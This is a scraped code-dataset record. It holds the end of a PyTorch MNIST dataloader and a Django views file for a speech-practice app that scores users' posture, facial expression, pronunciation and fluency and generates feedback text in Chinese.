sampler=train_sampler)\n validation_loader = torch.utils.data.DataLoader(dataset, batch_size=btx, sampler=valid_sampler)\n\n return train_loader, validation_loader\n\n\ndef get_test_dataset():\n \"\"\"\n Get the test dataset loaded\n\n :return: The test dataset\n \"\"\"\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n\n return torch.utils.data.DataLoader(\n datasets.MNIST('./dataset', train=False, download=True, transform=transform),\n batch_size=100, shuffle=True)\n","repo_name":"innvariant/sparsity-experiments-2021","sub_path":"pruning-ffns/util/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"11753554926","text":"import datetime\r\nimport hashlib\r\nimport json\r\nimport os\r\nimport random\r\nimport shutil\r\nimport threading\r\nimport uuid\r\nimport xml.etree.ElementTree as ET\r\nimport mediapipe as mp\r\nimport numpy as np\r\nfrom deepface import DeepFace\r\nfrom django.core.files.base import ContentFile\r\nfrom django.core.files.storage import default_storage\r\nfrom django.http import HttpResponse, JsonResponse\r\nfrom django.shortcuts import render, redirect\r\nimport re\r\n# 解决 Forbidden (CSRF token missing or incorrect.)\r\nfrom speech_ai import settings\r\nfrom . import models\r\nfrom .MyForms import *\r\nfrom .fuc import findDb\r\nfrom .py.Recorder import Recorder\r\n\r\nimport cv2\r\nfrom mtcnn import MTCNN\r\nfrom PIL import Image\r\n\r\nfrom pathlib import Path\r\n\r\n# 项目根目录\r\nBaseDir = Path(__file__).resolve().parent.parent\r\nBaseDir = str(BaseDir).replace('\\\\', '/')\r\n# print(BaseDir)\r\n\r\n# 存放上一张图片的人体点位置\r\nlast_pose = {}\r\n\r\n\r\n# 姿态识别和保存为图片, 返回姿态位置\r\ndef picture(read_file, save_file=''):\r\n mp_drawing = mp.solutions.drawing_utils\r\n mp_drawing_styles = mp.solutions.drawing_styles\r\n mp_holistic = mp.solutions.holistic\r\n holistic = mp_holistic.Holistic(static_image_mode=True)\r\n\r\n image = cv2.imread(read_file)\r\n image_hight, image_width, _ = image.shape\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n results = holistic.process(image)\r\n\r\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in\r\n results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33 * 4)\r\n # Lh = np.array([[res.x, res.y, res.z] for res in results.left_hand_landmarks.landmark]).flatten() if results.left_hand_landmarks else np.zeros(21*3)\r\n # Rh = np.array([[res.x, res.y, res.z] for res in results.right_hand_landmarks.landmark]).flatten() if results.right_hand_landmarks else np.zeros(21*3)\r\n\r\n annotated_image = image.copy()\r\n mp_drawing.draw_landmarks(annotated_image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS,\r\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style())\r\n mp_drawing.draw_landmarks(annotated_image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS)\r\n mp_drawing.draw_landmarks(annotated_image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS)\r\n if save_file != '':\r\n cv2.imwrite(save_file, cv2.cvtColor(annotated_image, cv2.COLOR_RGB2BGR))\r\n\r\n return pose.reshape(-1, 4)\r\n\r\n\r\nstand_pose = picture(os.path.join(settings.MEDIA_ROOT, 'pose', '1.png').replace('\\\\', '/'))\r\n\r\n\r\n# 开始录制\r\ndef start_record(request): # pass 后端录制要改成前端录制\r\n # obj_record.start()\r\n response = HttpResponse(json.dumps({\"status\": 1}), content_type=\"application/json\")\r\n response[\"Access-Control-Allow-Origin\"] = \"*\"\r\n response[\"Access-Control-Allow-Methods\"] = \"POST, GET, OPTIONS\"\r\n response[\"Access-Control-Max-Age\"] = \"1000\"\r\n response[\"Access-Control-Allow-Headers\"] = \"*\"\r\n return response\r\n\r\n\r\n# 结束录制\r\ndef stop_record(request): # pass 后端录制要改成前端录制\r\n # obj_record.stop()\r\n response = HttpResponse(json.dumps({\"status\": 1}), content_type=\"application/json\")\r\n response[\"Access-Control-Allow-Origin\"] = \"*\"\r\n response[\"Access-Control-Allow-Methods\"] = \"POST, GET, OPTIONS\"\r\n response[\"Access-Control-Max-Age\"] = \"1000\"\r\n response[\"Access-Control-Allow-Headers\"] = \"*\"\r\n return response\r\n\r\n\r\n# 姿态识别 、 表情识别\r\n# @csrf_exempt\r\ndef speech(request):\r\n if request.session.get('user_name', None):\r\n if request.method == 'POST':\r\n backends = ['opencv', 'ssd', 'dlib', 'mtcnn', 'retinaface', 'mediapipe']\r\n user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n time = request.POST.get('time').replace('/', '-')\r\n time_name = time.replace(' ', '_').replace(':', '-')\r\n img_time = round(float(request.POST.get('imgTime')), 2)\r\n\r\n user_dir = os.path.join(settings.MEDIA_ROOT, 'pose', user.id).replace('\\\\', '/')\r\n date_dir = os.path.join(user_dir, time_name).replace('\\\\', '/')\r\n\r\n img_content = request.FILES.get('speech')\r\n if not os.path.isdir(user_dir):\r\n os.makedirs(user_dir)\r\n if not os.path.isdir(date_dir):\r\n os.makedirs(date_dir)\r\n\r\n file_name = request.POST.get('total') + '.png'\r\n file_name2 = request.POST.get('total') + '_' + '1' + '.png'\r\n\r\n file_path = date_dir + '/' + file_name\r\n save_file = date_dir + '/' + file_name2\r\n\r\n # with open(filePath, 'wb+') as f:\r\n # for chunk in imgContent.chunks():\r\n # f.write(chunk)\r\n default_storage.save(file_path, img_content)\r\n\r\n if request.POST.get('total') == '1':\r\n flag = True\r\n limbs = 0\r\n body = 0\r\n last_pose[user.id] = picture(file_path, save_file)\r\n score = poseScore(stand_pose, last_pose[user.id])\r\n\r\n else:\r\n test = picture(file_path, save_file)\r\n limbs = limbsChanges(last_pose[user.id], test)\r\n body = bodyDeviation(last_pose[user.id], test)\r\n if limbs + body > 1:\r\n flag = True\r\n else:\r\n flag = False\r\n score = poseScore(stand_pose, test)\r\n last_pose[user.id] = test\r\n\r\n # eps = DeepFace.analyze(img_path=file_path, detector_backend=backends[5], actions=('emotion',),\r\n # enforce_detection=False)\r\n eps = MyExpression(file_path)\r\n\r\n ret = {'eps': eps, 'status': True, 'tip': '成功执行'} # eps['dominant_emotion']\r\n\r\n pose = models.Pose.objects.create(\r\n uid=user.id,\r\n img='/media/pose/' + user.id + '/' + time_name + '/' + file_name,\r\n pose='/media/pose/' + user.id + '/' + time_name + '/' + file_name2,\r\n score=score, emotion=eps[0], emotion_prob=eps[1],\r\n flag=flag, limbsChanges=limbs, bodyDeviation=body,\r\n date=time, imgTime=img_time)\r\n pose.save()\r\n\r\n return JsonResponse(ret)\r\n else:\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n\r\n# 上传视频\r\ndef video(request):\r\n if request.method == 'POST':\r\n if request.session.get('user_name', None):\r\n user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n vid = request.FILES.get('video')\r\n videoExt = request.POST.get('videoExt')\r\n analyse_flag = request.POST.get('analyseFlag')\r\n time = request.POST.get('time').replace('/', '-')\r\n\r\n # 不存在则创建文件夹\r\n user_dir = os.path.join(settings.MEDIA_ROOT, 'pose', user.id).replace('\\\\', '/')\r\n time_name = request.POST.get('time').replace('/', '-').replace(' ', '_').replace(':', '-')\r\n date_dir = os.path.join(user_dir, time_name).replace('\\\\', '/')\r\n if not os.path.isdir(user_dir):\r\n os.makedirs(user_dir)\r\n if not os.path.isdir(date_dir):\r\n os.makedirs(date_dir)\r\n\r\n # 保存视频\r\n file_path = date_dir + '/1.' + str(videoExt)\r\n default_storage.save(file_path, ContentFile(vid.read()))\r\n\r\n # flag 为 true 进行分析\r\n if analyse_flag == 'true':\r\n # 创建音视频分析线程\r\n video_thread = threading.Thread(target=video_analyse, args=(file_path, date_dir, user.id, time))\r\n audio_thread = threading.Thread(target=audio_analyse, args=(file_path, date_dir, user.id, time))\r\n\r\n # print(time, type(time))\r\n\r\n # 启动线程\r\n video_thread.start()\r\n audio_thread.start()\r\n # 等待所有线程完成\r\n video_thread.join()\r\n audio_thread.join()\r\n\r\n elif analyse_flag == 'false':\r\n audio_analyse(file_path, user.id, time)\r\n\r\n ret = {'tip': '分析完成', }\r\n return JsonResponse(ret)\r\n\r\n else:\r\n return redirect(\"/login/tip/您还未登�� !/\")\r\n\r\n\r\n# 音像分离\r\ndef convert_video_to_audio(file_path, date_dir):\r\n from pydub import AudioSegment\r\n from pydub.exceptions import CouldntDecodeError\r\n import os\r\n\r\n # print('经过此函数1')\r\n file_ext = os.path.splitext(file_path)[1]\r\n try:\r\n audio = AudioSegment.from_file(file_path, file_ext[1:])\r\n except CouldntDecodeError:\r\n raise Exception(f\" {file_ext} 格式不支持, 请使用 mp4, webm, flv,wav 等视频音频格式格式\")\r\n # 转换为单声道\r\n audio = audio.set_channels(1)\r\n\r\n # 转换为采样率16kHz\r\n audio = audio.set_frame_rate(16000)\r\n\r\n # 采样位数16位\r\n audio = audio.set_sample_width(2)\r\n\r\n # 保存为wav文件\r\n # 设置文件名字为源文件的前缀\r\n filename = os.path.basename(file_path)\r\n filename_without_extension = os.path.splitext(filename)[0]\r\n new_file_path = os.path.join(date_dir, filename_without_extension + \".wav\").replace(\"\\\\\", \"/\")\r\n audio.export(new_file_path, format=\"wav\")\r\n print('经过函数 convert_video_to_audio', new_file_path)\r\n return new_file_path\r\n\r\n\r\nfrom .py.EGG.text_audio_emo import text_audio_emo_predict\r\n\r\n\r\ndef audio_analyse(file_path, date_dir, uid, time):\r\n print('音频分析及发音准确度统计')\r\n # 提取音频\r\n audio_path = convert_video_to_audio(file_path, date_dir)\r\n\r\n # 对象声明\r\n obj = text_audio_emo_predict(audio_name=audio_path)\r\n result = obj.total_predict()\r\n text_ret = json.dumps(result[0])\r\n audio_ret = json.dumps(result[1])\r\n\r\n record = Recorder(audio_name=audio_path)\r\n # 执行中间过渡函数\r\n temp = record.betweenness()\r\n final_result = record.evaluation_audio()\r\n affix_score = final_result[0]\r\n global xml_list\r\n xml_list = final_result[1]\r\n length = len(xml_list)\r\n\r\n # 存储分数\r\n fc_list = []\r\n ic_list = []\r\n pc_list = []\r\n tc_list = []\r\n # 解析所有的XML文件并将它们拼接起来\r\n content_all = ''\r\n for i in range(len(xml_list)):\r\n # 先读取发音准确度可视化,再读取分数\r\n # 读取可视化\r\n tree = ET.parse(xml_list[i])\r\n root = tree.getroot()\r\n content_all += root.find('read_chapter').find('rec_paper').find('read_chapter').get('content')\r\n # 读取分数\r\n tmp_xml = record.get_xml_score(xml_list[i])\r\n fc_list.append(tmp_xml['fluency_score'])\r\n ic_list.append(tmp_xml['integrity_score'])\r\n pc_list.append(tmp_xml['phone_score'])\r\n tc_list.append(tmp_xml['tone_score'])\r\n # 继续可视化操作\r\n # 初始化字典,用于存储每个字的perr_msg属性\r\n perr_msg_dict = {}\r\n # 遍历XML文件中的所有word元素并更新字典\r\n for sentence in root.findall('.//sentence'):\r\n for word in sentence.findall('word'):\r\n word_content = word.get('content')\r\n phone_list = word.findall('syll/phone')\r\n\r\n # 统计phone元素中perr_msg属性值为0的个数\r\n perr_msg_count = sum(1 for phone in phone_list if phone.get('perr_msg') == '0')\r\n\r\n # 根据perr_msg的个数生成一个嵌套字典\r\n if perr_msg_count == 0:\r\n perr_msg_dict[word_content] = {'perr_msg': 2}\r\n elif perr_msg_count == 1:\r\n perr_msg_dict[word_content] = {'perr_msg': 1}\r\n else:\r\n perr_msg_dict[word_content] = {'perr_msg': 0}\r\n # 根据perr_msg属性在content_all上设置不同颜色的背景\r\n content_colored = ''\r\n for char in content_all:\r\n if char in perr_msg_dict:\r\n perr_msg = perr_msg_dict[char]['perr_msg']\r\n if perr_msg == 0:\r\n content_colored += f'{char}'\r\n elif perr_msg == 1:\r\n content_colored += f'{char}'\r\n elif perr_msg == 2:\r\n content_colored += f'{char}'\r\n else:\r\n content_colored += char\r\n # 继续对分数的操作 取两位小数等\r\n fc_list = [float(i) for i in fc_list]\r\n ic_list = [float(i) for i in ic_list]\r\n pc_list = [float(i) for i in pc_list]\r\n tc_list = [float(i) for i in tc_list]\r\n\r\n fluency_score = round(sum(fc_list) / length, 2)\r\n integrity_score = round(sum(ic_list) / length, 2)\r\n phone_score = round(sum(pc_list) / length, 2)\r\n tone_score = round(sum(tc_list) / length, 2)\r\n total_score = round(fluency_score * 0.4 + integrity_score * 0.1 +\r\n affix_score * 0.2 + phone_score * 0.15 + tone_score * 0.15, 2)\r\n\r\n speech_temp = models.Speach.objects.create(\r\n uid=uid, date=time, total_score=total_score,\r\n fluency_score=fluency_score, integrity_score=integrity_score,\r\n phone_score=phone_score, tone_score=tone_score, affix_score=affix_score,\r\n video_path=file_path.replace('\\\\', '/').replace(BaseDir, ''), color_content=content_colored,\r\n textual_emotion=text_ret, phonetic_emotion=audio_ret\r\n )\r\n speech_temp.save()\r\n\r\n\r\nimport dlib\r\nfrom PIL import Image\r\nfrom torchvision import transforms\r\nfrom torch.nn.functional import softmax\r\n\r\n# 加载模型\r\nimport torch\r\n\r\n# 加载已保存的模型\r\nmodel_path = BaseDir + '/media/weights/Expression.pth'\r\nmodel = torch.load(model_path, map_location=torch.device('cpu'))\r\n\r\n# 设置为评估模式\r\nmodel.eval()\r\n\r\n\r\ndef MyExpression(image_path):\r\n emotion = ['anger', 'disgust', 'fear', 'happy', 'neutral', 'sad', 'surprise']\r\n\r\n transform = transforms.Compose([\r\n transforms.Resize((48, 48)),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.5], std=[0.5])\r\n ])\r\n\r\n # 装载dlib的人脸检测器\r\n face_detector = dlib.get_frontal_face_detector()\r\n image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\r\n\r\n # 使用dlib检测人脸\r\n faces = face_detector(image, 1)\r\n\r\n if len(faces) == 0:\r\n return 'neutral'\r\n\r\n # 获取人脸区域\r\n x, y, w, h = faces[0].left(), faces[0].top(), faces[0].width(), faces[0].height()\r\n\r\n # 裁剪人脸\r\n cropped_face = image[y:y + h, x:x + w]\r\n\r\n # 将图像转换为PIL图像\r\n face_image = Image.fromarray(cropped_face)\r\n\r\n # 转换为模型所需的输入格式\r\n face_image_rgb = face_image.convert('RGB')\r\n face_tensor = transform(face_image_rgb).unsqueeze(0)\r\n\r\n # 使用模型进行预测\r\n output = model(face_tensor)\r\n\r\n prediction = torch.argmax(output, 1)\r\n\r\n # 计算置信度\r\n probabilities = softmax(output, dim=1)\r\n prob = probabilities.cpu().detach().numpy().max()\r\n\r\n return [emotion[prediction.item()], prob]\r\n\r\n\r\n# 本地视频分析\r\ndef video_analyse(video_path, date_dir, uid, time):\r\n print('视频分析及表情姿态统计')\r\n video_path = video_path.replace('\\\\', '/')\r\n vid = cv2.VideoCapture(video_path)\r\n\r\n # 提取帧的频率\r\n frame_rate = vid.get(cv2.CAP_PROP_FPS)\r\n # 计算总帧数\r\n frame_count = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))\r\n\r\n # 计算每一帧的时间\r\n frame_time = 1 / frame_rate\r\n\r\n # 每隔几秒截取一帧\r\n interval = 5\r\n\r\n # 计算每隔 interval 秒需要截取的帧数\r\n frames_to_capture = int(interval / frame_time)\r\n\r\n print(\"总帧率:\", frame_count, \", 帧频率:\", frame_rate)\r\n\r\n count = 1\r\n for i in range(0, frame_count, frames_to_capture):\r\n random_frame_index = random.randint(i, i + frames_to_capture)\r\n vid.set(cv2.CAP_PROP_POS_FRAMES, random_frame_index)\r\n success, image = vid.read()\r\n\r\n if success:\r\n # cv2.imwrite(file_path, image)\r\n mp_drawing = mp.solutions.drawing_utils\r\n mp_drawing_styles = mp.solutions.drawing_styles\r\n mp_holistic = mp.solutions.holistic\r\n holistic = mp_holistic.Holistic(static_image_mode=True)\r\n\r\n # image = cv2.imread(file_path)\r\n image_height, image_width, _ = image.shape\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n results = holistic.process(image)\r\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in\r\n results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33 * 4)\r\n annotated_image = image.copy()\r\n mp_drawing.draw_landmarks(annotated_image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS,\r\n landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style())\r\n mp_drawing.draw_landmarks(annotated_image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS)\r\n mp_drawing.draw_landmarks(annotated_image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS)\r\n\r\n if pose.any() != 0:\r\n # try:\r\n # 原始图片\r\n file_path = os.path.join(date_dir, \"{}.jpg\".format(count)).replace('\\\\', '/')\r\n cv2.imwrite(file_path, cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\r\n\r\n # 人体关键点标记的图片\r\n pose_path = os.path.join(date_dir, \"{}_1.jpg\".format(count)).replace('\\\\', '/')\r\n cv2.imwrite(pose_path, cv2.cvtColor(annotated_image, cv2.COLOR_RGB2BGR))\r\n\r\n # 表情识别\r\n # backends = ['opencv', 'ssd', 'dlib', 'mtcnn', 'retinaface', 'mediapipe']\r\n # eps = DeepFace.analyze(img_path=file_path, detector_backend=backends[0], actions=('emotion',))\r\n\r\n eps = MyExpression(file_path)\r\n if eps is None:\r\n continue\r\n print(eps)\r\n\r\n if count == 1:\r\n last_pose[uid] = pose.reshape(-1, 4)\r\n limbs = 0\r\n body = 0\r\n flag = True\r\n else:\r\n test = pose.reshape(-1, 4)\r\n limbs = limbsChanges(last_pose[uid], test)\r\n body = bodyDeviation(last_pose[uid], test)\r\n if limbs + body > 1:\r\n flag = True\r\n else:\r\n flag = False\r\n last_pose[uid] = test\r\n\r\n img_time = round(random_frame_index * frame_time, 2)\r\n score = poseScore(stand_pose, pose.reshape(-1, 4))\r\n pose = models.Pose.objects.create(\r\n uid=uid,\r\n # 标记\r\n img=file_path.replace('\\\\', '/').replace(BaseDir, ''),\r\n pose=pose_path.replace('\\\\', '/').replace(BaseDir, ''),\r\n score=score, emotion=eps[0], emotion_prob=eps[1], # eps['dominant_emotion']\r\n flag=flag, limbsChanges=limbs, bodyDeviation=body,\r\n date=time, imgTime=img_time)\r\n pose.save()\r\n count += 1\r\n # except:\r\n # print(\"表情识别失败\")\r\n else:\r\n print(\"未识别到姿态\")\r\n else:\r\n print('截取图像未成功')\r\n vid.release()\r\n\r\n\r\n# 查分\r\ndef speachScore(request):\r\n if request.method == 'GET':\r\n uid = request.session.get('user_id')\r\n if uid:\r\n # user_name = request.session.get('user_name')\r\n dates = models.Speach.objects.filter(uid=uid).values('date').distinct()\r\n if len(dates) == 0:\r\n return redirect(\"/index/tip/请您先评测 !/\")\r\n dates = [i['date'] for i in list(dates)]\r\n date = dates[-1]\r\n\r\n return redirect('/login/score/' + date.strftime('%Y-%m-%d_%H:%M:%S'))\r\n else:\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n if request.method == 'POST':\r\n uid = request.session.get('user_id')\r\n date = request.POST.get('date')\r\n if uid:\r\n return redirect(\"/login/score/\" + date.replace(' ', '_'))\r\n else:\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n\r\n# 生成综合评价性文字\r\ndef generate_feedback(tone_score, phone_score, fluency_score, affix_score, body_score, accurate_ratio):\r\n feedback = []\r\n\r\n # 发音调型反馈\r\n if tone_score < 80:\r\n feedback.append(\"发音调型需要改进。请加强练习,关注声调的高低起伏,确保正确地表达每个音节的声调;\")\r\n elif tone_score < 90:\r\n feedback.append(\"发音调型较好,但仍有提升空间。继续关注声调的高低起伏,提高声调掌握程度;\")\r\n else:\r\n feedback.append(\"发音调型非常好。保持良好的声调掌握,确保演讲内容准确传达;\")\r\n\r\n # 发音韵律反馈\r\n if phone_score < 80:\r\n feedback.append(\"发音韵律方面存在问题。注意提高语速、音量和停顿的掌握,使演讲更具有吸引力;\")\r\n elif phone_score < 90:\r\n feedback.append(\"发音韵律较好,但仍有提升空间。继续关注语速、音量和停顿的掌握,使演讲更加动听;\")\r\n else:\r\n feedback.append(\"发音韵律非常好。保持良好的语速、音量和停顿掌握,为听众带来愉悦的听觉体验;\")\r\n\r\n # 演讲流畅度反馈\r\n if fluency_score < 75:\r\n feedback.append(\"演讲流畅度有待提高。多加练习,确保在演讲过程中不出现过多的停顿;\")\r\n elif fluency_score < 90:\r\n feedback.append(\"演讲流畅度较好,但仍有提升空间。继续练习,确保在演讲过程中流畅自如;\")\r\n else:\r\n feedback.append(\"演讲流畅度非常好。保持流畅的表达,让听众更容易理解演讲内容;\")\r\n\r\n # 演讲缀词冗余反馈\r\n if affix_score < 85:\r\n feedback.append(\"演讲中缀词和冗余表达较多。注意提高表达的简洁明了,避免使用过多的填充词;\")\r\n elif affix_score < 90:\r\n feedback.append(\"演讲中缀词和冗余表达较少,但仍有改进空间。继续提高表达的简洁明了,减少填充词的使用;\")\r\n else:\r\n feedback.append(\"演讲中缀词和冗余表达非常少。保持简洁明了的表达,使听众更容易理解演讲内容;\")\r\n\r\n # 人体姿态评估反馈\r\n if body_score < 60:\r\n feedback.append(\"人体姿态需要改进。注意保持自然放松的站姿,保持眼神交流,以增强与听众的互动;\")\r\n elif body_score < 80:\r\n feedback.append(\"人体姿态较好,但仍有提升空间。继续保持自然的站姿和眼神交流,提高演讲的表现力;\")\r\n else:\r\n feedback.append(\"人体姿态非常好。保持良好的站姿和眼神交流,为听众带来愉悦的视觉体验;\")\r\n\r\n # 发音准确性反馈\r\n if accurate_ratio < 0.6:\r\n feedback.append(\"发音准确性较低。请加强发音练习,提高发音准确性,确保听众能更好地理解演讲内容。\")\r\n elif accurate_ratio < 0.8:\r\n feedback.append(\"发音准确性较好,但仍有提升空间。继续加强发音练习,进一步提高发音准确性。\")\r\n else:\r\n feedback.append(\"发音准确性非常高。保持准确的发音,使听众更容易理解演讲内容。\")\r\n\r\n return feedback\r\n\r\n\r\ndef speachDateScore(request, date):\r\n if request.method == 'GET':\r\n uid = request.session.get('user_id')\r\n user_name = request.session.get('user_name')\r\n\r\n # date 进行处理\r\n date = datetime.datetime.strptime(date, '%Y-%m-%d_%H:%M:%S')\r\n # print(date)\r\n\r\n if uid:\r\n # 姿态\r\n exists = models.Speach.objects.filter(date=date).exists()\r\n\r\n if exists:\r\n dates = models.Speach.objects.filter(uid=uid).values('date').distinct()\r\n dates = [i['date'].strftime('%Y-%m-%d %H:%M:%S') for i in list(dates)]\r\n\r\n # 语音\r\n speech_table_value = list(models.Speach.objects.filter(uid=uid, date=date).values(\r\n 'content', 'fluency_score', 'integrity_score', 'phone_score', 'tone_score',\r\n 'affix_score', 'total_score', 'topic_score', 'color_content', 'textual_emotion',\r\n 'phonetic_emotion'))\r\n topic_score = speech_table_value[0]['topic_score']\r\n speech_table = [speech_table_value[0]['fluency_score'], speech_table_value[0]['integrity_score'],\r\n speech_table_value[0]['phone_score'], speech_table_value[0]['tone_score'],\r\n speech_table_value[0]['affix_score'], speech_table_value[0]['total_score'],\r\n ]\r\n # 文本情感\r\n text_emo = json.loads(speech_table_value[0]['textual_emotion'])\r\n text_emotion_dict = {'negative': 0.15, 'neutral': 0.5, 'positive': 0.85}\r\n text_emotion = []\r\n for i in range(len(text_emo)):\r\n if text_emo[i][0] == 'neutral':\r\n text_emotion.append(\r\n [text_emo[i][0], text_emotion_dict[text_emo[i][0]] + (text_emo[i][1] - 0.5) * 0.2])\r\n else:\r\n text_emotion.append(\r\n [text_emo[i][0], text_emotion_dict[text_emo[i][0]] + (text_emo[i][1] - 0.5) * 0.15])\r\n\r\n # 语音情感\r\n audio_emo = json.loads(speech_table_value[0]['phonetic_emotion'])\r\n audio_emotion_dict = {'angry': 0.15, 'anger': 0.15, 'fear': 0.15, 'sad': 0.15, 'neutral': 0.5,\r\n 'happy': 0.85, 'surprise': 0.85}\r\n audio_emotion = []\r\n for i in range(len(audio_emo)):\r\n if audio_emo[i][0] == 'neutral':\r\n audio_emotion.append(\r\n [audio_emo[i][0], audio_emotion_dict[audio_emo[i][0]] + (audio_emo[i][1] - 0.5) * 0.2])\r\n else:\r\n audio_emotion.append(\r\n [audio_emo[i][0], audio_emotion_dict[audio_emo[i][0]] + (audio_emo[i][1] - 0.5) * 0.15])\r\n\r\n # 发音可视化字符\r\n pro_viual = speech_table_value[0]['color_content']\r\n # 发音可视化字符串\r\n # 输出评价文字\r\n # 统计颜色个数\r\n # 定义三个正则表达式,分别用于匹配三种颜色\r\n red_pattern = re.compile(r'style=\"background-color: #dc6c64\">(.+?)')\r\n green_pattern = re.compile(r'style=\"background-color: #b7e1cd\">(.+?)')\r\n yellow_pattern = re.compile(r'style=\"background-color: #ffec8b\">(.+?)')\r\n # 使用正则表达式匹配字符串,并计算出现次数\r\n red_count = len(re.findall(red_pattern, pro_viual))\r\n green_count = len(re.findall(green_pattern, pro_viual))\r\n yellow_count = len(re.findall(yellow_pattern, pro_viual))\r\n # 统计评价标准\r\n # 音准反馈\r\n accurate_ratio = green_count / (green_count + red_count + yellow_count)\r\n # 肢体反馈/暂以total_score作为肢体评测反馈依据\r\n body_score = speech_table_value[0]['total_score']\r\n # 调型反馈\r\n tone_score = speech_table_value[0]['tone_score']\r\n # 韵律反馈\r\n phone_score = speech_table_value[0]['phone_score']\r\n # 流畅度反馈\r\n fluency_score = speech_table_value[0]['fluency_score']\r\n # 缀词反馈\r\n affix_score = speech_table_value[0]['affix_score']\r\n # 调用函数,获取反馈字符串\r\n feedback = generate_feedback(tone_score, phone_score, fluency_score,\r\n affix_score, body_score, accurate_ratio)\r\n\r\n # 是否有主题契合度评分\r\n topic_flag = 'false'\r\n if topic_score is not None:\r\n speech_table.append(topic_score)\r\n else:\r\n topic_flag = 'true'\r\n\r\n pose = list(models.Pose.objects.filter(uid=request.session.get('user_id'), date=date)\r\n .values('score', 'imgTime', 'pose', 'flag', 'emotion',\r\n 'limbsChanges', 'bodyDeviation', 'emotion_prob'\r\n ))\r\n pose_score = [i['score'] for i in pose]\r\n imgTime = [i['imgTime'] for i in pose]\r\n flag = [str(i['flag']) for i in pose]\r\n emotion = [i['emotion'] for i in pose]\r\n\r\n emotion_prob = [i['emotion_prob'] for i in pose]\r\n expression_emotion_dict = {'angry': 0.15, 'anger': 0.15, 'fear': 0.15, 'sad': 0.15, 'disgust': 0.15,\r\n 'neutral': 0.5,\r\n 'happy': 0.85, 'surprise': 0.85}\r\n expression_emotion = []\r\n for i in range(len(emotion)):\r\n if emotion[i] == 'neutral':\r\n expression_emotion.append(\r\n [emotion[i], expression_emotion_dict[emotion[i]] + (emotion_prob[i] - 0.5) * 0.2])\r\n else:\r\n expression_emotion.append(\r\n [emotion[i], expression_emotion_dict[emotion[i]] + (emotion_prob[i] - 0.5) * 0.15])\r\n\r\n dt = {'score': pose_score, 'imgTime': imgTime, 'emotion': emotion, 'flag': flag,\r\n 'expression_emotion': expression_emotion, 'text_emotion': text_emotion,\r\n 'audio_emotion': audio_emotion}\r\n\r\n limbs = sum([i['limbsChanges'] for i in pose])\r\n body = sum([i['bodyDeviation'] for i in pose])\r\n\r\n # pose 图片 flag 为 1 是否超过一定数量,没超过则全部显示\r\n count_flag = False\r\n if flag.count('True') > 10:\r\n count_flag = True\r\n pass\r\n # 返回\r\n return render(request, 'score/score.html',\r\n {'login_status': True, 'user_name': user_name,\r\n 'date': date.strftime('%Y-%m-%d %H:%M:%S'), 'data': dt, 'speech_score': speech_table,\r\n 'content': speech_table, 'pose': pose, 'count_flag': count_flag,\r\n 'topic_flag': topic_flag, 'dates': dates, 'limbs': limbs, 'body': body,\r\n 'pro_viual': pro_viual, 'feedback': feedback\r\n }) # pro_viual是音准可视化字符串,feedback是生成的反馈字符串\r\n else:\r\n return HttpResponse('

该日期下并没有评测 !

')\r\n\r\n else:\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n\r\n# 展示 头像\r\n# def show_avatar(request):\r\n# if request.session.get('user_name'):\r\n# user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n# avatar = user.avatar\r\n# # user = models.Avatar.objects.filter(name='trent')[0]\r\n# # avatarName = str(user.avatar)\r\n# # avatarUrl = '%s/users/%s' % (settings.MEDIA_URL, avatarName) # 另一种写法\r\n# # if request.method == 'GET':\r\n# # users = models.MyUser.objects.all()\r\n# # return render(request, 'login/show.html', {'avatar': avatar})\r\n# return render(request, 'login/show.html', {'avatar': avatar, 'username': user.username})\r\n# # avatar = os.path.join(settings.MEDIA_URL, 'photos/demo.png')\r\n# # avatar_info = {'userName':str(image.user), 'avatarUrl': avatarUrl}\r\n# # return render(request, 'login/show.html', {'avatar':avatar})\r\n# else:\r\n# return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n\r\n# 上传头像\r\n# def upload_avatar(request):\r\n# if request.method == 'POST':\r\n# if request.session.get('user_name', None):\r\n# # image = models.MyUser(\r\n# # username = request.session.get('user_name'),\r\n# # avatar=request.FILES.get('avatar'),\r\n# # # face=request.FILES.get('face')\r\n# # )\r\n# user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n# dire = os.path.join(settings.MEDIA_ROOT, 'avatar')\r\n# img = request.FILES.get('avatar')\r\n# fileName = user.id + '.' + img.name.split('.')[-1]\r\n# filePath = os.path.join(dire, fileName).replace('\\\\', '/')\r\n# # user.avatar.delete()\r\n# if not os.path.isdir(dire):\r\n# os.mkdir(dire)\r\n# if os.path.exists(filePath):\r\n# os.remove(filePath)\r\n# with open(filePath, 'wb+') as f:\r\n# for chunk in img.chunks():\r\n# f.write(chunk)\r\n# user.avatar = 'avatar' + '/' + fileName\r\n# user.save()\r\n# # models.MyUser.objects.filter(id=user.id).update(avatar = 